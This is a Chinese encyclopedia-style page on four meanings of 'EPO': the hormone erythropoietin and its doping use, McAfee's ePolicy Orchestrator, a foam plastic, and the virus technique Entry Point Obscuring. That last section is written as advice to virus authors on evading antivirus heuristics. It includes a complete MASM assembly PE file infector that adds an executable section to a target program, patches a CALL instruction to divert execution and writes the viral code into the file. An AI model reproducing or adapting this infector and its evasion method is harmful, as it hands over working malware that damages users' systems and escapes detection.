EPO - 王朝网络宽屏版

1·促红细胞生成素

1.EPO是促红细胞生成素（Erythropoietin）的英文简称。人体中的促红细胞生成素是由肾脏和肝脏分泌的一种激素样物质，能够促进红细胞生成。服用红细胞生成素可以使患肾病贫血的病人增加血流比溶度（即增加血液中红细胞百分比）。去年以来，这种药物已进入商业市场。人体缺氧时，此种激素生成增加，并导致红细胞增生。EPO兴奋剂正是根据促红细胞生成素的原理人工合成，它能促进肌肉中氧气生成，从而使肌肉更有劲、工作时间更长.

EPO是哺乳动物调节红细胞生成的主要调控因子。EPO作为一种糖蛋白激素，能够提高耐力运动员的成绩，其主要原因在于：一方面EPO能够刺激骨髓造血功能，及时有效地增加红细胞的数量，从而提高血液的携氧能力，甚至使用后的120天内都能使血红蛋白提高，使红细胞比积增加至55%～60%（一般人仅为37－49％）。

另一方面EPO能够增强机体对氧的结合、运输和供应能力，有利于在高强度竞技时，改善缺氧状态，促进肌肉中氧生成，从而使肌肉更加有力、工作时间更长。尤其对于从事自行车运动的这种耐力型运动员来说，其骨骼肌纤维类型中慢肌纤维比例较大，骨骼肌工作主要依靠有氧代谢方式供给能量，供氧能力的强弱直接影响骨骼肌的工作效率，因而如果使用EPO来提高骨骼肌的工作效率，效果是显而易见的。

2.计算机EPO技术

1.什么是EPO？

EPO是EntryPoint Obscuring技术的简写，意即入口模糊技术，该技术改变了传统的修改PE头部的入口点，使其指向病毒代码入口而使病毒代码得以执行的典型方法。

2.为什么需要EPO？

这要从反病毒技术的发展谈起，随着当今反病毒技术的不断提高，启发式查毒，虚拟机执行等方法广泛被各杀毒厂商采用，这些技术通过判断程序是否具有通常的病毒特征来发现病毒，使得传统类型病毒即使是新写的病毒也很容易被杀毒软件查出来。然而道高一尺，魔高一丈，为了对抗启发查毒，聪明Vxer们发明了EPO技术。

要想明白什么是EPO，首先看看启发查毒是如何判断程序被病毒感染的。很多杀毒软件不可能对PE文件的所有部分进行扫描，因为那样的话太耗时了，大部分只是对PE入口处的代码进行启发式检查。试想如果只是简单地修改PE的入口，则很容易被杀毒软件识别，如果可以把病毒代码隐藏代PE文件的某个中间的位置，那么要想找出病毒来势必要困难的多。EPO正是这样一种思想，通过把并入入口置于PE中某个不不显眼的位置，来减少被查杀的可能性。

多态和变形是当今病毒的发展趋势，但是虚拟机的出现还是给多态来了很大的威胁，为了减少被查杀的可能性，病毒应该综合采取各种手段进行自身的隐藏，而不仅仅是多态和变形，EPO正是这些技术之一。

我们的病毒需要EPO技术。

3.如何实现EPO？

最早的EPO不改变PE头中入口点的值，相反，他改变了程序入口处的代码，比如改成JMP VirStart跳转到病毒体执行，当然这样的技术在现在毫无用处，只能躲避最原始的对代码入口是否正常的检查。

因为在大多数程序中，代码段通常都不是最后一个节，而病毒采用的很多的则是在PE最后添加新节或在最后一个节附加代码，如果杀毒软件发现入口在最后一个节，则很可能就被感染了病毒。上述方法则通过伪装而躲过该种检测。

当今这种EPO已经没有什么用处了。如果你准备采用EPO技术作为你的病毒防护手段的话，请接着读下去吧。

另外一种实现EPO的方法是在PE文件代码中的任意指令位置，将其替换成JMP VirStart或CALL或其他转移指令跳转到病毒体去执行。此想法是自然的，但实现上有困难，首先，我们很难判断PE中的任意位置是否是一条指令的开始，因为这无异于要写一个反汇编器，对于简单的病毒，代价太大了。不过这是最完美的方法，因为现在在病毒中实现反编译引擎也是可能的，可以参考一些大型的变形病毒。

还有一种方法就是PATCH IAT的函数，因为Win32函数是调用频率很高的。好奇和聪明的你可能会问，为什么不直接Patch IAT中相应的函数地址呢？原因在于，PE loader加载PE的时候会用正确的函数地址填充这些地址，你的PATCH内容就会被覆盖。

因此只能采取变通的方法，通常是查找特定的指令，比如CALL [XXX]或JMP [XXX]指令，将XXX替换成指向病毒入口的地址。CALL DWORD PTR [XXX]和JMP DWORD PTR [XXX]通常是跳转到真正IAT函数地址去执行的指令。当然也可以查找其他指令，比如直接段内转移CALL XXX指令，替换XXX地址为指向VirStart的地址。

当然还可以搜索和替换其他指令，比如高级语言中最常用的PUSH ESP，MOV ESP，EBP指令对代表一个函数的开始，事实上，搜索任何指令都是可以的。

这过程需要一些计算，这不是我在这篇短文中能详细介绍的了，争取在下一期的杂志中详细介绍吧。

4.问题及对策

通过前面的说明你应该已经了解了EPO的用法和原理，对EPO已经产生了过度的乐观情绪。现在，让我给你浇一盆冷水，看看EPO的缺陷都在那些地方以及对策。

a．首先，搜索任意指令的方法有一定的局限。如果代码段中有数据该怎么办？很不幸地告诉你：

凉拌吧！数据中恰好有你待替换的指令机器码相同的数据，你只好认命了！

b．其次，如果替换的指令是废代码，也就是说在程序执行过程中，几乎永远不会执行到，那又怎么办？

c.再次，如果因为上面原因，导致Virus设计失败，导致目标程序无法正常执行，病毒几乎无法传播，而且由于杀死了目标程序，不但起不到EPO的作用，反而暴露了自己，又该怎么办？

也不要着急，任何技术总是有其优越性和缺陷的只要运用得当，还是可以起到比较好的效果，针对上面的问题a,b,c，下面是一些对策c,d,e。

c.尽量进行附加检查，比如e8（call XXX，段内直接转移），要看一下其目的是否是有效的代码段内的地址，如果不是，就几乎肯定是数据。其他特征的指令也要根据特点进行检查。

d.为了增加执行机会，最好替换对API调用的指令的地址，比如最普遍的是JMP DWORD PTR [XXX]，因为API是经常调用的，其执行概率要大一些。另外值得一提的是很多病毒在使用EPO时都替换对ExitProcess的调用指令，这样，病毒会在最后执行，也许有助于躲避杀毒软件。当然全部公开的秘密就不是秘密了，同样会很快遭到封杀。

e.加强学习，仔细思考，多做调试，减少错误。如果实在没有把握，则不用EPO，不要让技术成为你病毒的最大缺点。

5.代码实例（PKXP）

下面是PKXP作的一个小试验，试验EPO的应用，拿来作为示例吧：

例子下载

1．第一个节是.text

2．在.text中一定可以找到call xxxxxxxx.(E8 xxxxxxxx).

3．JMP DWORD PTR [YYYYYYYY]在.text中

4．根据找到的call xxxxxxxx计算出来的地址不会越界造成内存错误。

思路

1．判断PE合法性和可感染性（有多余空间）

2．添加新节，修改SizeOfImage

3．开始EPO

1）在.text中寻找E8 xxxxxxxx,根据xxxxxxxx获得JMP DWORD …的文件偏移。

2）计算跳转到VStart的相对距离，覆盖xxxxxxxx。

3）拷贝JMP DWORD PTR [YYYYYYYY]中的YYYYYYYY到病毒体内。

4．写入病毒代码，弹出对话框后，执行JMP DWORD PTR [YYYYYYYY]

特点

EPO部分只有30行，极适合初学EPO者.

代码:

.386

.model flat, stdcall

option casemap:none

include useful.inc

PEGame SEGMENT

start:

@pushsz 'e:estm.exe'

call InfectFile

Invoke MessageBox,0,0,0,0 ;用来装载User32,后面用

ret

InfectFile PROC FileName : DWORD

LOCAL hFile : DWORD

LOCAL hMapping : DWORD

LOCAL pMapping : DWORD

LOCAL ByteWrite: DWORD

pushad

push NULL

push FILE_ATTRIBUTE_NORMAL

push OPEN_EXISTING

push NULL

push FILE_SHARE_READ+FILE_SHARE_WRITE

push GENERIC_READ+GENERIC_WRITE

push FileName

call CreateFile

cmp eax,INVALID_HANDLE_value

jz IF_Exit

mov hFile,eax

xor edi , edi ;节约空间

push edi

push PAGE_READWRITE

push edi

push hFile

call CreateFileMapping

or eax,eax

jz IF_F3

mov hMapping , eax

push edi ;edi=0

push edi

push FILE_MAP_READ+FILE_MAP_WRITE

push hMapping

call MapViewOfFile

or eax,eax

jz IF_F2

mov pMapping,eax

mov esi,eax

assume esi:ptr IMAGE_DOS_HEADER

cmp [esi].e_magic,IMAGE_DOS_SIGNATURE

jnz IF_F1

cmp [esi].e_lfarlc,040h

jnz IF_F1

add esi,[esi].e_lfanew

assume esi:ptr IMAGE_NT_HEADERS

cmp [esi].Signature,IMAGE_NT_SIGNATURE ;是PE文件吗？

jnz IF_F1

cmp [esi].OptionalHeader.Subsystem,2

jnz IF_F1

cmp [esi].OptionalHeader.CheckSum,0 ;避免感染!0的文件

jnz IF_F1 ;合法性判断完毕，开始感染

cmp word ptr [esi+1ah],0815h ;设置感染标志

jz IF_F1

mov eax,[esi].OptionalHeader.AddressOfEntryPoint

add eax,[esi].OptionalHeader.ImageBase

mov HostEntry,eax ;保存原入口

movzx eax,[esi].FileHeader.NumberOfSections

mov ecx,sizeof IMAGE_SECTION_HEADER

mul ecx

add eax,sizeof IMAGE_NT_HEADERS

add eax,esi

mov edi,eax

add eax,sizeof IMAGE_SECTION_HEADER

sub eax,pMapping

cmp eax,[esi].OptionalHeader.SizeOfHeaders

ja IF_F1

;*****************************************

;空间允许, ^0^,edi指向新节

;*****************************************

inc [esi].FileHeader.NumberOfSections

assume edi:ptr IMAGE_SECTION_HEADER

mov dword ptr[edi],'cvc.' ;Name

push VEnd-VStart

pop [edi].Misc.VirtualSize ;VirtualSize

push [esi].OptionalHeader.SizeOfImage

pop [edi].VirtualAddress ;VirtualAddress

mov eax,[edi].Misc.VirtualSize

mov ecx,[esi].OptionalHeader.FileAlignment

div ecx

inc eax

mul ecx

mov [edi].SizeOfRawData,eax ;SizeOfRawData

lea eax,[edi-28h+14h] ;prev PointerToRawData

mov eax,[eax]

lea ecx,[edi-28h+10h] ;prev SizeOfRawData

add eax,[ecx]

mov [edi].PointerToRawData,eax ;PointerToRawData

mov [edi].Characteristics,0E0000020h ;可读可写可执行

;***************************************************************

;更新SizeOfImage,使新节可以正确加载并首先执行

;***************************************************************

mov eax,[edi].Misc.VirtualSize

mov ecx,[esi].OptionalHeader.SectionAlignment

div ecx

inc eax

mul ecx

add eax,[esi].OptionalHeader.SizeOfImage

mov [esi].OptionalHeader.SizeOfImage,eax

mov word ptr [esi+1ah],0815h ;写入感染标志

push pMapping ;文件内存映像首地址

push esi ;esi -> IMAGE_NT_HEADER

push edi ; edi -> new Section

call SimpleEPO

@pushsz 'User32.dll'

call GetModuleHandle

@pushsz 'MessageBoxA'

push eax

call GetProcAddress

mov MsgBox,eax ;得到MessageBoxA的线形地址

push FILE_BEGIN

push 0

push [edi].PointerToRawData

push hFile

call SetFilePointer

;****************************************************************

;设置文件指针到结尾后，写入从VStart开始的代码，大小经过文件对齐

;****************************************************************

push 0

lea eax,ByteWrite

push eax

push [edi].SizeOfRawData

push offset VStart

push hFile

call WriteFile

IF_F1:

push pMapping

call UnmapViewOfFile

IF_F2:

push hMapping

call CloseHandle

IF_F3:

push hFile

call CloseHandle

IF_Exit:

popad

ret 4

InfectFile ENDP

;---------------------------------StartEPO------------------------------

;入口参数： pNewSection : 新添加节(病毒节)的指针

; pNTHeader : 文件IMAGE_NT_HEADER的指针

; pMapping : 文件指针

;出口参数：修改了文件.text节的第一条CALL XXXXXXXX 指令，跳转到VStart.

;拷贝JMP DWORD PTR [YYYYYYYY]中的YY…到Ret2ApiCall.

;--------------------------------------------------------------------------

SimpleEPO PROC pNewSection : DWORD ,pNTHeader : DWORD , pMapping : DWORD

pushad

mov edx , pNTHeader

add edx , sizeof IMAGE_NT_HEADERS

assume edx : ptr IMAGE_SECTION_HEADER

mov ecx , [edx].SizeOfRawData

mov edi , [edx].PointerToRawData

add edi , pMapping ;Now edi = .text 的在文件中的偏移

@SearchE8:

mov al , 0e8h

repne scasb ;search for call xxxxxxxx

mov esi , edi ;edi - > xxxxxxxx 而不是 e8 xx xx xx xx.

lodsd ;search call relative

add esi , eax ;esi - > JMP DWORD PTR [YYYYYYYY]

lodsw

cmp ax , 025ffh ;esi - > YYYYYYYY

jnz @SearchE8

PatchCALLandCopyJMP:

mov eax , [edx].VirtualAddress ;.text VirtualAddress

add eax , edi

sub eax , pMapping

sub eax , [edx].PointerToRawData ;eax contains VA of CALL XXXXXXXX

add eax , 4 ;sizeof(CALL xxxxxxxx) – sizeof(0E8h)

mov edx , pNewSection

mov edx , [edx].VirtualAddress

xchg eax , edx

sub eax , edx ;get new XXXXXXXX

stosd

mov edi , offset Ret2ApiCall ;write YYYYYYYY

lodsd

stosd

popad

ret 12

SimpleEPO ENDP

;***************************************************************

;从VStart->VEnd是将插入到e:estm.exe的代码

;功能是弹出一个对话框，然后返回原入口执行

;***************************************************************

VStart:

pushad

call gdelta

gdelta:

pop ebp

sub ebp,offset gdelta

lea eax, [ebp+offset s]

push 0

push eax

push 0

mov eax,12345678h

MsgBox = dword ptr $-4

call eax

popad

db 0FFh,25h

Ret2ApiCAll:

dd 0 ; [zzzzzzzz]

s db 'hi',0

VEnd:

EPOGame ends

end start

3·ePolocy Orchestrator 反病毒服务器

Mcafee公司的EPO4.0服务器登陆界面

EPO是Mcafee公司开发的反病毒服务器，在EPO的管理下，可以控制VSE8.0banben、8.5和8.7版本的杀毒软件，并可以进行启动杀毒（PreScan）、防火墙策略控制、准入等多项网络安全功能。

目前常用的EPO版本是3.5、3.61和4.0版本，最新版为4.5(测试阶段)

EPO发泡塑料

EPO是特殊聚合工艺生产的一种“共聚物”，组成和结构独特，由30%的聚乙烯和70%的聚苯乙烯组成。PE组分主要分布在粒子的外层，促进颗粒之间的塑化和结合，PS组分主要分布在粒子的内部，对于泡粒结构具有良好支撑作用。

EPO最大程度地综合了PE和PS的优点，如图所示。与EPS在外力的冲击下极易碎裂和产生碎屑不同，EPO冲击后不会产生碎裂和碎屑，表观质量好，具有出色的抗冲击性，特别是其多次跌落冲击性能。

由NOVA Chemicals生产，商标名ARCEL。